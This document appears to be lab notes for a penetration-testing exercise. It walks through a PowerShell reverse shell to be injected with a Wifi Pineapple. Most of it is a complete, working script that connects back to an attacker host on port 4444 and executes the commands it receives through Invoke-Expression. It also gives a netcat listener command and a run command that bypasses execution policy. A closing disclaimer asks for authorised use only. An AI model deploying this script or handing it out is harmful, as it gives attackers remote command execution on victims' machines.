Plan

Keylogging lab through using a Wifi Pinapple

• use it to inject the Reverse Shell Script

Components of a Reverse Shell

1. Listener: The attacking machine runs a service that listens for incoming connections.
2. Reverse Shell Script: The target machine runs a script that connects back to the listener and provides a shell interface.

Step-by-Step Explanation of a PowerShell Reverse Shell Script

Step 1: Set Up a Listener on the Attacker Machine

On your attacking machine, you need to set up a listener that will wait for incoming connections. You can use netcat (nc) for this purpose:

nc -lvnp 4444

• -l: Listen mode.
• -v: Verbose mode.
• -n: No DNS resolution.
• -p: Local port.

This command tells netcat to listen on port 4444 for incoming connections.

Step 2: Create the Reverse Shell Script on the Target Machine

A simple PowerShell reverse shell script can be written as follows:

# Define the IP address and port of the Raspberry Pi (attacker)
$attackerIP = "ATTACKER IP" #typically etho0
$port = 4444

try {
    # Create a new TCP client and connect to the attacker
    $client = New-Object System.Net.Sockets.TCPClient($attackerIP, $port)
    if (-not $client.Connected) {
        throw "Could not establish a connection to $attackerIP on port $port."
    }

    # Get the network stream
    $stream = $client.GetStream()
    if (-not $stream) {
        throw "Failed to get the network stream."
    }

    # Initialize stream writer and reader
    $writer = New-Object System.IO.StreamWriter($stream)
    $writer.AutoFlush = $true
    $buffer = New-Object System.Byte[] 1024
    $encoding = New-Object System.Text.AsciiEncoding

    while ($true) {
        try {
            # Send the current directory path as a prompt
            $writer.Write("PS " + (Get-Location).Path + "> ")

            # Read the command from the attacker
            $read = $stream.Read($buffer, 0, $buffer.Length)
            if ($read -le 0) {
                throw "Failed to read from the network stream."
            }
            $cmd = ($encoding.GetString($buffer, 0, $read)).Trim()

            # Execute the received command
            try {
                $result = (Invoke-Expression $cmd 2>&1 | Out-String)
            }
            catch {
                $result = $_.Exception.Message
            }

            # Send the result back to the attacker
            $writer.WriteLine($result)
            $writer.Flush()
        }
        catch {
            Write-Error "Error processing command: $_"
            break
        }
    }
}
catch {
    Write-Error "Critical error: $_"
}
finally {
    if ($client -and $client.Connected) {
        $client.Close()
    }
}

Explanation of the PowerShell Script

1. Establishing the Connection:

   $client = New-Object System.Net.Sockets.TCPClient("ATTACKER_IP", 4444)
   $stream = $client.GetStream()

   • $client: Creates a new TCP client object that connects to the attacker's IP on port 4444.
   • $stream: Retrieves the network stream used to send and receive data.

2. Stream Writers and Encoders:

   $writer = New-Object System.IO.StreamWriter($stream)
   $writer.AutoFlush = $true
   $buffer = New-Object System.Byte[] 1024
   $encoding = New-Object System.Text.AsciiEncoding

   • $writer: A stream writer to send data to the attacker.
   • $writer.AutoFlush = $true: Ensures that the buffer is flushed automatically.
   • $buffer: A byte array buffer to read incoming data.
   • $encoding: ASCII encoding to convert bytes to strings and vice versa.

3. Main Loop:

   while ($true) {
       $writer.Write("PS " + (Get-Location).Path + "> ")
       $read = $stream.Read($buffer, 0, $buffer.Length)
       $cmd = ($encoding.GetString($buffer, 0, $read)).Trim()
       try {
           $result = (Invoke-Expression $cmd 2>&1 | Out-String )
       }
       catch {
           $result  = $_.Exception.Message
       }
       $writer.WriteLine($result)
       $writer.Flush()
   }

   • while ($true): An infinite loop to keep the connection open.
   • $writer.Write("PS " + (Get-Location).Path + "> "): Sends the current PowerShell prompt to the attacker.
   • $read = $stream.Read($buffer, 0, $buffer.Length): Reads incoming data from the stream into the buffer.
   • $cmd = ($encoding.GetString($buffer, 0, $read)).Trim(): Converts the buffer bytes to a string and trims whitespace.
   • Invoke-Expression $cmd: Executes the received command.
   • 2>&1 | Out-String: Captures any errors and converts the output to a string.
   • $writer.WriteLine($result): Sends the result back to the attacker.
   • $writer.Flush(): Ensures the output is sent immediately.

4. Closing the Connection:

   $client.Close()

   • This line closes the TCP connection when the script ends (though in this infinite loop, it never reaches this point unless the script is interrupted).

Putting It All Together

1. Start the listener on your attacker machine:

   nc -lvnp 4444

2. Run the PowerShell script on the target machine:

   • Save the script to a .ps1 file, for example, reverse_shell.ps1.
   • Execute the script using PowerShell:

     powershell -ExecutionPolicy Bypass -File reverse_shell.ps1

Security and Ethical Considerations

• Ethical Use: Only use reverse shells in environments where you have explicit permission to do so, such as in penetration testing with prior authorization.
• Security: Reverse shells can be a significant security risk if misused. Ensure that you are following best practices for securing your systems and networks.
• Legal: Unauthorized access to computer systems is illegal and punishable by law. Always ensure that you have legal authorization before performing any activities involving reverse shells or other hacking tools.

By understanding the components and how they work, you can modify and create your own reverse shell scripts for legitimate and educational purposes.